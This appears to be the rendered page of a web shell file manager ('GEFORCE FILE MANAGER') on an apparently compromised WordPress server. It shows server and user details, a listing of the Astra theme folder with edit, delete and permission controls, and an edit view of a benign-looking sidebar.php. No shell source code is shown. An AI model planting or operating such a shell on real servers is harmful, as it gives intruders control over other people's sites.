[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
themes
/
astra
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 admin
SET
[ DEL ]
📁 assets
SET
[ DEL ]
📁 inc
SET
[ DEL ]
📁 languages
SET
[ DEL ]
📁 template-parts
SET
[ DEL ]
📄 404.php
687 B
SET
[ EDIT ]
|
[ DEL ]
📄 SECURITY.md
427 B
SET
[ EDIT ]
|
[ DEL ]
📄 archive.php
729 B
SET
[ EDIT ]
|
[ DEL ]
📄 changelog.txt
172,088 B
SET
[ EDIT ]
|
[ DEL ]
📄 comments.php
4,608 B
SET
[ EDIT ]
|
[ DEL ]
📄 footer.php
605 B
SET
[ EDIT ]
|
[ DEL ]
📄 functions.php
10,349 B
SET
[ EDIT ]
|
[ DEL ]
📄 header.php
1,404 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.php
906 B
SET
[ EDIT ]
|
[ DEL ]
📄 page.php
868 B
SET
[ EDIT ]
|
[ DEL ]
📄 readme.txt
8,057 B
SET
[ EDIT ]
|
[ DEL ]
📄 screenshot.jpg
366,434 B
SET
[ EDIT ]
|
[ DEL ]
📄 search.php
771 B
SET
[ EDIT ]
|
[ DEL ]
📄 searchform.php
2,272 B
SET
[ EDIT ]
|
[ DEL ]
📄 sidebar.php
1,000 B
SET
[ EDIT ]
|
[ DEL ]
📄 single.php
695 B
SET
[ EDIT ]
|
[ DEL ]
📄 style.css
4,575 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme.json
2,411 B
SET
[ EDIT ]
|
[ DEL ]
📄 toolset-config.json
7,640 B
SET
[ EDIT ]
|
[ DEL ]
📄 wpml-config.xml
5,233 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: sidebar.php
<?php /** * The sidebar containing the main widget area. * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Astra * @since 1.0.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } $astra_sidebar = apply_filters( 'astra_get_sidebar', 'sidebar-1' ); echo '<div '; echo wp_kses_post( astra_attr( 'sidebar', array( 'id' => 'secondary', 'class' => join( ' ', astra_get_secondary_class() ), ) ) ); echo '>'; ?> <div class="sidebar-main" <?php /** @psalm-suppress TooManyArguments */ echo apply_filters( 'astra_sidebar_data_attrs', '', $astra_sidebar ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped, Generic.Commenting.DocComment.MissingShort ?>> <?php astra_sidebars_before(); ?> <?php if ( is_active_sidebar( $astra_sidebar ) ) { dynamic_sidebar( $astra_sidebar ); } astra_sidebars_after(); ?> </div><!-- .sidebar-main --> </div><!-- #secondary -->